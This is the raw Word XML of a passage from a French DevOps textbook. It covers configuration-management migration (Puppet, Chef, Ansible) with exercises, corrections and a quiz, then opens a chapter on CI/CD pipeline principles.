            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service absent après reconstruction</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Inventaire exhaustif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Ordre modifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Échec au démarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>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Dépendances explicites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secret non migré</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentification refusée</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Test par service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Double gestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Modifications écrasées</w:t>
            </w:r>
          </w:p>
        </w:tc>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Une seule source de vérité</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LA RECONSTRUCTION EST LE VRAI TEST</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une machine configurée par l'outil doit pouvoir être détruite et reconstruite sans intervention manuelle. Tant que ce test échoue, la configuration n'est pas réellement codifiée.</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ÉVALUER UNE MIGRATION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Combien de temps la reconstruction manuelle prend-elle aujourd'hui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Quelles exceptions ne sont pas codifiées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Qui maîtrise l'outil cible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Quel est le coût d'une régression pendant la bascule ?</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Peut-on migrer un service pilote sans risque ?</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push exécute à la demande, le pull converge en continu.</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Puppet et Chef reposent sur un agent et un serveur.</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pull corrige la dérive entre deux exécutions.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Puppet décrit des ressources, Chef écrit du Ruby.</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L'ordre des ressources doit être explicite.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choix dépend du parc et de l'équipe, pas de la mode.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reconstruction sans intervention est le vrai test.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migration se fait par périmètre, avec comparaison d'état.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La configuration est maîtrisée. La dernière partie assemble le tout : livraison, sécurité et exploitation.</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77.1 — Traduire une tâche Ansible en ressource Puppet</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Installer Nginx, déployer un modèle et recharger le service.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Déclarez le paquet.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 xml:space="preserve">Déclarez le fichier avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>notify</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Déclarez le service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 77.2 — Comparer deux modèles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une équipe hésite entre Ansible et Puppet pour 200 serveurs.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Listez les besoins réels.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Évaluez les contraintes.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Proposez une décision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 77.3 — Préparer une migration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   MIGRATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un parc de trente serveurs passe de scripts maison à Ansible.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Inventoriez l'existant.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Migrez un serveur pilote.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Comparez l'état.</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77.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>package { 'nginx':</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ensure =&gt; installed,</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>file { '/etc/nginx/sites-available/site.conf':</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ensure  =&gt; file,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content =&gt; template('site/site.conf.erb'),</w:t>
        <w:br/>
        <w:t xml:space="preserve">  owner   =&gt; 'root',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  group   =&gt; 'root',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mode    =&gt; '0644',</w:t>
        <w:br/>
        <w:t xml:space="preserve">  require =&gt; Package['nginx'],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  notify  =&gt; Service['nginx'],</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>service { 'nginx':</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ensure  =&gt; running,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  enable  =&gt; true,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  require =&gt; Package['nginx'],</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> établit l'ordre, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>notify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclenche le rechargement après modification du fichier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contrairement à Ansible, le service est déclaré une fois et le rechargement est géré par la notification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 77.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Besoins : conformité continue, inventaire fiable, rapports d'écart.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contraintes : équipe de trois personnes, pas d'expérience Puppet, applications conteneurisées.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Décision : Ansible pour la configuration initiale, images conteneurisées pour les applications, réévaluation si le parc dépasse plusieurs centaines de machines hétérogènes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 77.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># Inventaire des paquets et services d'un serveur</w:t>
        <w:br/>
        <w:t>ssh web1 'dpkg -l | awk "{print \$2}" | sort' &gt; web1-paquets.txt</w:t>
        <w:br/>
        <w:t>ssh web1 'systemctl list-unit-files --state=enabled --no-legend' &gt; web1-services.txt</w:t>
        <w:br/>
        <w:br/>
        <w:t># Après migration, comparer</w:t>
        <w:br/>
        <w:t>diff web1-paquets.txt web1-paquets-apres.txt</w:t>
        <w:br/>
        <w:t>diff web1-services.txt web1-services-apres.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La comparaison révèle les paquets installés manuellement et jamais documentés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le serveur pilote doit être reconstructible avant de généraliser.</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 modèle utilise un agent qui tire sa configuration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Push</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Pull</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Les deux</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Aucun</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Quel est l'avantage principal du pull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Moins de sécurité</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Correction continue de la dérive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Aucune installation</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Plus rapide à écrire</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Quel langage utilise Chef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YAML</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Ruby</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HCL</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Go</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Quel test prouve qu'une configuration est réellement codifiée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Le lint passe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La machine se reconstruit sans intervention</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 playbook est long</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L'agent répond</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Puppet et Chef reposent sur un agent en mode pull.</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L'agent réapplique l'état périodiquement, même après modification manuelle.</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Les recettes Chef sont écrites en Ruby.</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La reconstruction depuis zéro est la preuve décisive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId114"/>
          <w:footerReference w:type="default" r:id="rId115"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE V</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Livraison, sécurité et exploitation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>CI/CD, GitHub Actions, publications et traçabilité, GitOps, gestion des secrets, observabilité et ingénierie de fiabilité.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>46. CI/CD : principes et structure d'un pipeline · 47. GitHub Actions et GitLab CI en pratique · 48. Publications, versions et traçabilité · 49. GitOps : le dépôt comme source de vérité · 50. Gestion des secrets · 51. Observabilité : métriques, journaux et traces · 52. SRE : objectifs de fiabilité et gestion d'incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>78. CI/CD : principes et structure d'un pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automatiser de la première ligne de code à la production, avec des étapes rapides, fiables et observables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 77</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Distinguer intégration, livraison et déploiement continus.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Concevoir les étapes d'un pipeline efficace.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Ordonner les contrôles du plus rapide au plus lent.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Construire un artefact unique et le promouvoir.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Diagnostiquer un pipeline lent ou instable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>78.1 Trois mots, trois engagements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Intégration continue, livraison continue et déploiement continu désignent des pratiques différentes. Les confondre conduit à promettre plus que ce que l'équipe peut tenir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.294 — Trois pratiques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04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Pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Ce qui est automatisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Décision humaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégration continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fusion et vérification fréquentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Livraison continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Tout jusqu'à l'artefact prêt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Déployer ou non</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déploiement continu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tout, jusqu'en production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2651"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aucune, sauf incident</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PIPELINE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Enchaînement automatisé d'étapes déclenché par un changement : construction, tests, analyse, publication, déploiement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq étapes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Un pipeline minimal mais complet</w:t>
        <w:br/>
        <w:t>stages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - lint        # 30 s</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - test        # 2 min</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - build       # 1 min</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - scan        # 1 min</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - deploy      # 2 min</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>78.2 Le trajet d'un changement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
